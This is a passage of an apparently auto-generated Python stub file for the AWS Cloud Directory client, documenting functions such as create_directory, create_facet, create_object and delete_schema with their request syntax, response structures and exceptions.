for the typed link.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\n\n\n\n\n\n\nAttributeUpdates (list) -- [REQUIRED]The attributes update structure.\n\n(dict) --Structure that contains attribute update information.\n\nAttributeKey (dict) --The key of the attribute being updated.\n\nSchemaArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the schema that contains the facet and attribute.\n\nFacetName (string) -- [REQUIRED]The name of the facet that the attribute exists within.\n\nName (string) -- [REQUIRED]The name of the attribute.\n\n\n\nAttributeAction (dict) --The action to perform as part of the attribute update.\n\nAttributeActionType (string) --A type that can be either UPDATE_OR_CREATE or DELETE .\n\nAttributeUpdateValue (dict) --The value that you want to update to.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'Responses': [
{
'CreateObject': {
'ObjectIdentifier': 'string'
},
'AttachObject': {
'attachedObjectIdentifier': 'string'
},
'DetachObject': {
'detachedObjectIdentifier': 'string'
},
'UpdateObjectAttributes': {
'ObjectIdentifier': 'string'
},
'DeleteObject': {},
'AddFacetToObject': {},
'RemoveFacetFromObject': {},
'AttachPolicy': {},
'DetachPolicy': {},
'CreateIndex': {
'ObjectIdentifier': 'string'
},
'AttachToIndex': {
'AttachedObjectIdentifier': 'string'
},
'DetachFromIndex': {
'DetachedObjectIdentifier': 'string'
},
'AttachTypedLink': {
'TypedLinkSpecifier': {
'TypedLinkFacet': {
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
'SourceObjectReference': {
'Selector': 'string'
},
'TargetObjectReference': {
'Selector': 'string'
},
'IdentityAttributeValues': [
{
'AttributeName': 'string',
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
}
},
'DetachTypedLink': {},
'UpdateLinkAttributes': {}
},
]
}
Response Structure
(dict) --
Responses (list) --
A list of all the responses for each batch write.
(dict) --
Represents the output of a BatchWrite response operation.
CreateObject (dict) --
Creates an object in a Directory .
ObjectIdentifier (string) --
The ID that is associated with the object.
AttachObject (dict) --
Attaches an object to a Directory .
attachedObjectIdentifier (string) --
The ObjectIdentifier of the object that has been attached.
DetachObject (dict) --
Detaches an object from a Directory .
detachedObjectIdentifier (string) --
The ObjectIdentifier of the detached object.
UpdateObjectAttributes (dict) --
Updates a given object\xe2\x80\x99s attributes.
ObjectIdentifier (string) --
ID that is associated with the object.
DeleteObject (dict) --
Deletes an object in a Directory .
AddFacetToObject (dict) --
The result of an add facet to object batch operation.
RemoveFacetFromObject (dict) --
The result of a batch remove facet from object operation.
AttachPolicy (dict) --
Attaches a policy object to a regular object. An object can have a limited number of attached policies.
DetachPolicy (dict) --
Detaches a policy from a Directory .
CreateIndex (dict) --
Creates an index object. See Indexing and search for more information.
ObjectIdentifier (string) --
The ObjectIdentifier of the index created by this operation.
AttachToIndex (dict) --
Attaches the specified object to the specified index.
AttachedObjectIdentifier (string) --
The ObjectIdentifier of the object that was attached to the index.
DetachFromIndex (dict) --
Detaches the specified object from the specified index.
DetachedObjectIdentifier (string) --
The ObjectIdentifier of the object that was detached from the index.
AttachTypedLink (dict) --
Attaches a typed link to a specified source and target object. For more information, see Typed Links .
TypedLinkSpecifier (dict) --
Returns a typed link specifier as output.
TypedLinkFacet (dict) --
Identifies the typed link facet that is associated with the typed link.
SchemaArn (string) --
The Amazon Resource Name (ARN) that is associated with the schema. For more information, see arns .
TypedLinkName (string) --
The unique name of the typed link facet.
SourceObjectReference (dict) --
Identifies the source object that the typed link will attach to.
Selector (string) --
A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:
$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier
/some/path - Identifies the object based on path
#SomeBatchReference - Identifies the object in a batch call
TargetObjectReference (dict) --
Identifies the target object that the typed link will attach to.
Selector (string) --
A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:
$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier
/some/path - Identifies the object based on path
#SomeBatchReference - Identifies the object in a batch call
IdentityAttributeValues (list) --
Identifies the attribute value to update.
(dict) --
Identifies the attribute name and value for a typed link.
AttributeName (string) --
The attribute name of the typed link.
Value (dict) --
The value for the typed link.
StringValue (string) --
A string data value.
BinaryValue (bytes) --
A binary data value.
BooleanValue (boolean) --
A Boolean data value.
NumberValue (string) --
A number data value.
DatetimeValue (datetime) --
A date and time value.
DetachTypedLink (dict) --
Detaches a typed link from a specified source and target object. For more information, see Typed Links .
UpdateLinkAttributes (dict) --
Represents the output of a BatchWrite response operation.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.BatchWriteException
:return: {
'Responses': [
{
'CreateObject': {
'ObjectIdentifier': 'string'
},
'AttachObject': {
'attachedObjectIdentifier': 'string'
},
'DetachObject': {
'detachedObjectIdentifier': 'string'
},
'UpdateObjectAttributes': {
'ObjectIdentifier': 'string'
},
'DeleteObject': {},
'AddFacetToObject': {},
'RemoveFacetFromObject': {},
'AttachPolicy': {},
'DetachPolicy': {},
'CreateIndex': {
'ObjectIdentifier': 'string'
},
'AttachToIndex': {
'AttachedObjectIdentifier': 'string'
},
'DetachFromIndex': {
'DetachedObjectIdentifier': 'string'
},
'AttachTypedLink': {
'TypedLinkSpecifier': {
'TypedLinkFacet': {
'SchemaArn': 'string',
'TypedLinkName': 'string'
},
'SourceObjectReference': {
'Selector': 'string'
},
'TargetObjectReference': {
'Selector': 'string'
},
'IdentityAttributeValues': [
{
'AttributeName': 'string',
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
]
}
},
'DetachTypedLink': {},
'UpdateLinkAttributes': {}
},
]
}
:returns:
$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier
/some/path - Identifies the object based on path
#SomeBatchReference - Identifies the object in a batch call
"""
pass
def can_paginate(operation_name=None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name\nas the method name on the client. For example, if the\nmethod name is create_foo, and you\'d normally invoke the\noperation as client.create_foo(**kwargs), if the\ncreate_foo operation can be paginated, you can use the\ncall client.get_paginator('create_foo').
"""
pass
def create_directory(Name=None, SchemaArn=None):
"""
Creates a Directory by copying the published schema into the directory. A directory cannot be created without a schema.
You can also quickly create a directory using a managed schema, called the QuickStartSchema . For more information, see Managed Schema in the Amazon Cloud Directory Developer Guide .
See also: AWS API Documentation
Exceptions
:example: response = client.create_directory(
Name='string',
SchemaArn='string'
)
:type Name: string
:param Name: [REQUIRED]\nThe name of the Directory . Should be unique per account, per region.\n
:type SchemaArn: string
:param SchemaArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the published schema that will be copied into the data Directory . For more information, see arns .\n
:rtype: dict
ReturnsResponse Syntax
{
'DirectoryArn': 'string',
'Name': 'string',
'ObjectIdentifier': 'string',
'AppliedSchemaArn': 'string'
}
Response Structure
(dict) --
DirectoryArn (string) --
The ARN that is associated with the Directory . For more information, see arns .
Name (string) --
The name of the Directory .
ObjectIdentifier (string) --
The root object node of the created directory.
AppliedSchemaArn (string) --
The ARN of the published schema in the Directory . Once a published schema is copied into the directory, it has its own ARN, which is referred to applied schema ARN. For more information, see arns .
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryAlreadyExistsException
CloudDirectory.Client.exceptions.ResourceNotFoundException
:return: {
'DirectoryArn': 'string',
'Name': 'string',
'ObjectIdentifier': 'string',
'AppliedSchemaArn': 'string'
}
:returns:
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryAlreadyExistsException
CloudDirectory.Client.exceptions.ResourceNotFoundException
"""
pass
def create_facet(SchemaArn=None, Name=None, Attributes=None, ObjectType=None, FacetStyle=None):
"""
Creates a new Facet in a schema. Facet creation is allowed only in development or applied schemas.
See also: AWS API Documentation
Exceptions
:example: response = client.create_facet(
SchemaArn='string',
Name='string',
Attributes=[
{
'Name': 'string',
'AttributeDefinition': {
'Type': 'STRING'|'BINARY'|'BOOLEAN'|'NUMBER'|'DATETIME'|'VARIANT',
'DefaultValue': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
},
'IsImmutable': True|False,
'Rules': {
'string': {
'Type': 'BINARY_LENGTH'|'NUMBER_COMPARISON'|'STRING_FROM_SET'|'STRING_LENGTH',
'Parameters': {
'string': 'string'
}
}
}
},
'AttributeReference': {
'TargetFacetName': 'string',
'TargetAttributeName': 'string'
},
'RequiredBehavior': 'REQUIRED_ALWAYS'|'NOT_REQUIRED'
},
],
ObjectType='NODE'|'LEAF_NODE'|'POLICY'|'INDEX',
FacetStyle='STATIC'|'DYNAMIC'
)
:type SchemaArn: string
:param SchemaArn: [REQUIRED]\nThe schema ARN in which the new Facet will be created. For more information, see arns .\n
:type Name: string
:param Name: [REQUIRED]\nThe name of the Facet , which is unique for a given schema.\n
:type Attributes: list
:param Attributes: The attributes that are associated with the Facet .\n\n(dict) --An attribute that is associated with the Facet .\n\nName (string) -- [REQUIRED]The name of the facet attribute.\n\nAttributeDefinition (dict) --A facet attribute consists of either a definition or a reference. This structure contains the attribute definition. See Attribute References for more information.\n\nType (string) -- [REQUIRED]The type of the attribute.\n\nDefaultValue (dict) --The default value of the attribute (if configured).\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\nIsImmutable (boolean) --Whether the attribute is mutable or not.\n\nRules (dict) --Validation rules attached to the attribute definition.\n\n(string) --\n(dict) --Contains an Amazon Resource Name (ARN) and parameters that are associated with the rule.\n\nType (string) --The type of attribute validation rule.\n\nParameters (dict) --The minimum and maximum parameters that are associated with the rule.\n\n(string) --\n(string) --\n\n\n\n\n\n\n\n\n\n\n\n\nAttributeReference (dict) --An attribute reference that is associated with the attribute. See Attribute References for more information.\n\nTargetFacetName (string) -- [REQUIRED]The target facet name that is associated with the facet reference. See Attribute References for more information.\n\nTargetAttributeName (string) -- [REQUIRED]The target attribute name that is associated with the facet reference. See Attribute References for more information.\n\n\n\nRequiredBehavior (string) --The required behavior of the FacetAttribute .\n\n\n\n\n
:type ObjectType: string
:param ObjectType: Specifies whether a given object created from this facet is of type node, leaf node, policy or index.\n\nNode: Can have multiple children but one parent.\nLeaf node: Cannot have children but can have multiple parents.\nPolicy: Allows you to store a policy document and policy type. For more information, see Policies .\nIndex: Can be created with the Index API.\n\n
:type FacetStyle: string
:param FacetStyle: There are two different styles that you can define on any given facet, Static and Dynamic . For static facets, all attributes must be defined in the schema. For dynamic facets, attributes can be defined during data plane operations.
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.FacetAlreadyExistsException
CloudDirectory.Client.exceptions.InvalidRuleException
CloudDirectory.Client.exceptions.FacetValidationException
:return: {}
:returns:
(dict) --
"""
pass
def create_index(DirectoryArn=None, OrderedIndexedAttributeList=None, IsUnique=None, ParentReference=None, LinkName=None):
"""
Creates an index object. See Indexing and search for more information.
See also: AWS API Documentation
Exceptions
:example: response = client.create_index(
DirectoryArn='string',
OrderedIndexedAttributeList=[
{
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
],
IsUnique=True|False,
ParentReference={
'Selector': 'string'
},
LinkName='string'
)
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe ARN of the directory where the index should be created.\n
:type OrderedIndexedAttributeList: list
:param OrderedIndexedAttributeList: [REQUIRED]\nSpecifies the attributes that should be indexed on. Currently only a single attribute is supported.\n\n(dict) --A unique identifier for an attribute.\n\nSchemaArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the schema that contains the facet and attribute.\n\nFacetName (string) -- [REQUIRED]The name of the facet that the attribute exists within.\n\nName (string) -- [REQUIRED]The name of the attribute.\n\n\n\n\n
:type IsUnique: boolean
:param IsUnique: [REQUIRED]\nIndicates whether the attribute that is being indexed has unique values or not.\n
:type ParentReference: dict
:param ParentReference: A reference to the parent object that contains the index object.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
:type LinkName: string
:param LinkName: The name of the link between the parent object and the index object.
:rtype: dict
ReturnsResponse Syntax
{
'ObjectIdentifier': 'string'
}
Response Structure
(dict) --
ObjectIdentifier (string) --
The ObjectIdentifier of the index created by this operation.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.FacetValidationException
CloudDirectory.Client.exceptions.LinkNameAlreadyInUseException
CloudDirectory.Client.exceptions.UnsupportedIndexTypeException
:return: {
'ObjectIdentifier': 'string'
}
:returns:
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.FacetValidationException
CloudDirectory.Client.exceptions.LinkNameAlreadyInUseException
CloudDirectory.Client.exceptions.UnsupportedIndexTypeException
"""
pass
def create_object(DirectoryArn=None, SchemaFacets=None, ObjectAttributeList=None, ParentReference=None, LinkName=None):
"""
Creates an object in a Directory . Additionally attaches the object to a parent, if a parent reference and LinkName is specified. An object is simply a collection of Facet attributes. You can also use this API call to create a policy object, if the facet from which you create the object is a policy facet.
See also: AWS API Documentation
Exceptions
:example: response = client.create_object(
DirectoryArn='string',
SchemaFacets=[
{
'SchemaArn': 'string',
'FacetName': 'string'
},
],
ObjectAttributeList=[
{
'Key': {
'SchemaArn': 'string',
'FacetName': 'string',
'Name': 'string'
},
'Value': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
}
},
],
ParentReference={
'Selector': 'string'
},
LinkName='string'
)
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe Amazon Resource Name (ARN) that is associated with the Directory in which the object will be created. For more information, see arns .\n
:type SchemaFacets: list
:param SchemaFacets: [REQUIRED]\nA list of schema facets to be associated with the object. Do not provide minor version components. See SchemaFacet for details.\n\n(dict) --A facet.\n\nSchemaArn (string) --The ARN of the schema that contains the facet with no minor component. See arns and In-Place Schema Upgrade for a description of when to provide minor versions.\n\nFacetName (string) --The name of the facet.\n\n\n\n\n
:type ObjectAttributeList: list
:param ObjectAttributeList: The attribute map whose attribute ARN contains the key and attribute value as the map value.\n\n(dict) --The combination of an attribute key and an attribute value.\n\nKey (dict) -- [REQUIRED]The key of the attribute.\n\nSchemaArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the schema that contains the facet and attribute.\n\nFacetName (string) -- [REQUIRED]The name of the facet that the attribute exists within.\n\nName (string) -- [REQUIRED]The name of the attribute.\n\n\n\nValue (dict) -- [REQUIRED]The value of the attribute.\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\n\n\n\n
:type ParentReference: dict
:param ParentReference: If specified, the parent reference to which this object will be attached.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
:type LinkName: string
:param LinkName: The name of link that is used to attach this object to a parent.
:rtype: dict
ReturnsResponse Syntax
{
'ObjectIdentifier': 'string'
}
Response Structure
(dict) --
ObjectIdentifier (string) --
The identifier that is associated with the object.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.FacetValidationException
CloudDirectory.Client.exceptions.LinkNameAlreadyInUseException
CloudDirectory.Client.exceptions.UnsupportedIndexTypeException
:return: {
'ObjectIdentifier': 'string'
}
:returns:
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.FacetValidationException
CloudDirectory.Client.exceptions.LinkNameAlreadyInUseException
CloudDirectory.Client.exceptions.UnsupportedIndexTypeException
"""
pass
def create_schema(Name=None):
"""
Creates a new schema in a development state. A schema can exist in three phases:
See also: AWS API Documentation
Exceptions
:example: response = client.create_schema(
Name='string'
)
:type Name: string
:param Name: [REQUIRED]\nThe name that is associated with the schema. This is unique to each account and in each region.\n
:rtype: dict
ReturnsResponse Syntax{
'SchemaArn': 'string'
}
Response Structure
(dict) --
SchemaArn (string) --The Amazon Resource Name (ARN) that is associated with the schema. For more information, see arns .
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.SchemaAlreadyExistsException
CloudDirectory.Client.exceptions.AccessDeniedException
:return: {
'SchemaArn': 'string'
}
:returns:
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.SchemaAlreadyExistsException
CloudDirectory.Client.exceptions.AccessDeniedException
"""
pass
def create_typed_link_facet(SchemaArn=None, Facet=None):
"""
Creates a TypedLinkFacet . For more information, see Typed Links .
See also: AWS API Documentation
Exceptions
:example: response = client.create_typed_link_facet(
SchemaArn='string',
Facet={
'Name': 'string',
'Attributes': [
{
'Name': 'string',
'Type': 'STRING'|'BINARY'|'BOOLEAN'|'NUMBER'|'DATETIME'|'VARIANT',
'DefaultValue': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
},
'IsImmutable': True|False,
'Rules': {
'string': {
'Type': 'BINARY_LENGTH'|'NUMBER_COMPARISON'|'STRING_FROM_SET'|'STRING_LENGTH',
'Parameters': {
'string': 'string'
}
}
},
'RequiredBehavior': 'REQUIRED_ALWAYS'|'NOT_REQUIRED'
},
],
'IdentityAttributeOrder': [
'string',
]
}
)
:type SchemaArn: string
:param SchemaArn: [REQUIRED]\nThe Amazon Resource Name (ARN) that is associated with the schema. For more information, see arns .\n
:type Facet: dict
:param Facet: [REQUIRED]\n\nFacet structure that is associated with the typed link facet.\n\nName (string) -- [REQUIRED]The unique name of the typed link facet.\n\nAttributes (list) -- [REQUIRED]A set of key-value pairs associated with the typed link. Typed link attributes are used when you have data values that are related to the link itself, and not to one of the two objects being linked. Identity attributes also serve to distinguish the link from others of the same type between the same objects.\n\n(dict) --A typed link attribute definition.\n\nName (string) -- [REQUIRED]The unique name of the typed link attribute.\n\nType (string) -- [REQUIRED]The type of the attribute.\n\nDefaultValue (dict) --The default value of the attribute (if configured).\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\nIsImmutable (boolean) --Whether the attribute is mutable or not.\n\nRules (dict) --Validation rules that are attached to the attribute definition.\n\n(string) --\n(dict) --Contains an Amazon Resource Name (ARN) and parameters that are associated with the rule.\n\nType (string) --The type of attribute validation rule.\n\nParameters (dict) --The minimum and maximum parameters that are associated with the rule.\n\n(string) --\n(string) --\n\n\n\n\n\n\n\n\n\n\nRequiredBehavior (string) -- [REQUIRED]The required behavior of the TypedLinkAttributeDefinition .\n\n\n\n\n\nIdentityAttributeOrder (list) -- [REQUIRED]The set of attributes that distinguish links made from this facet from each other, in the order of significance. Listing typed links can filter on the values of these attributes. See ListOutgoingTypedLinks and ListIncomingTypedLinks for details.\n\n(string) --\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.FacetAlreadyExistsException
CloudDirectory.Client.exceptions.InvalidRuleException
CloudDirectory.Client.exceptions.FacetValidationException
:return: {}
:returns:
(dict) --
"""
pass
def delete_directory(DirectoryArn=None):
"""
Deletes a directory. Only disabled directories can be deleted. A deleted directory cannot be undone. Exercise extreme caution when deleting directories.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_directory(
DirectoryArn='string'
)
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe ARN of the directory to delete.\n
:rtype: dict
ReturnsResponse Syntax{
'DirectoryArn': 'string'
}
Response Structure
(dict) --
DirectoryArn (string) --The ARN of the deleted directory.
Exceptions
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.DirectoryNotDisabledException
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryDeletedException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.InvalidArnException
:return: {
'DirectoryArn': 'string'
}
"""
pass
def delete_facet(SchemaArn=None, Name=None):
"""
Deletes a given Facet . All attributes and Rule s that are associated with the facet will be deleted. Only development schema facets are allowed deletion.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_facet(
SchemaArn='string',
Name='string'
)
:type SchemaArn: string
:param SchemaArn: [REQUIRED]\nThe Amazon Resource Name (ARN) that is associated with the Facet . For more information, see arns .\n
:type Name: string
:param Name: [REQUIRED]\nThe name of the facet to delete.\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.FacetNotFoundException
CloudDirectory.Client.exceptions.FacetInUseException
:return: {}
:returns:
(dict) --
"""
pass
def delete_object(DirectoryArn=None, ObjectReference=None):
"""
Deletes an object and its associated attributes. Only objects with no children and no parents can be deleted. The maximum number of attributes that can be deleted during an object deletion is 30. For more information, see Amazon Cloud Directory Limits .
See also: AWS API Documentation
Exceptions
:example: response = client.delete_object(
DirectoryArn='string',
ObjectReference={
'Selector': 'string'
}
)
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe Amazon Resource Name (ARN) that is associated with the Directory where the object resides. For more information, see arns .\n
:type ObjectReference: dict
:param ObjectReference: [REQUIRED]\nA reference that identifies the object.\n\nSelector (string) --A path selector supports easy selection of an object by the parent/child links leading to it from the directory root. Use the link names from each parent/child link to construct the path. Path selectors start with a slash (/) and link names are separated by slashes. For more information about paths, see Access Objects . You can identify an object in one of the following ways:\n\n$ObjectIdentifier - An object identifier is an opaque string provided by Amazon Cloud Directory. When creating objects, the system will provide you with the identifier of the created object. An object\xe2\x80\x99s identifier is immutable and no two objects will ever share the same object identifier\n/some/path - Identifies the object based on path\n#SomeBatchReference - Identifies the object in a batch call\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.ObjectNotDetachedException
:return: {}
:returns:
(dict) --
"""
pass
def delete_schema(SchemaArn=None):
"""
Deletes a given schema. Schemas in a development and published state can only be deleted.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_schema(
SchemaArn='string'
)
:type SchemaArn: string
:param SchemaArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the development schema. For more information, see arns .\n
:rtype: dict
ReturnsResponse Syntax{
'SchemaArn': 'string'
}
Response Structure
(dict) --
SchemaArn (string) --The input ARN that is returned as part of the response. For more information, see arns .
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.StillContainsLinksException
:return: {
'SchemaArn': 'string'
}
"""
pass
def delete_typed_link_facet(SchemaArn=None, Name=None):
"""
Deletes a TypedLinkFacet . For more information, see Typed Links .
See also: AWS API Documentation
Exceptions
:example: response = client.delete_typed_link_facet(
SchemaArn='string',
Name='string'
)
:type SchemaArn: string
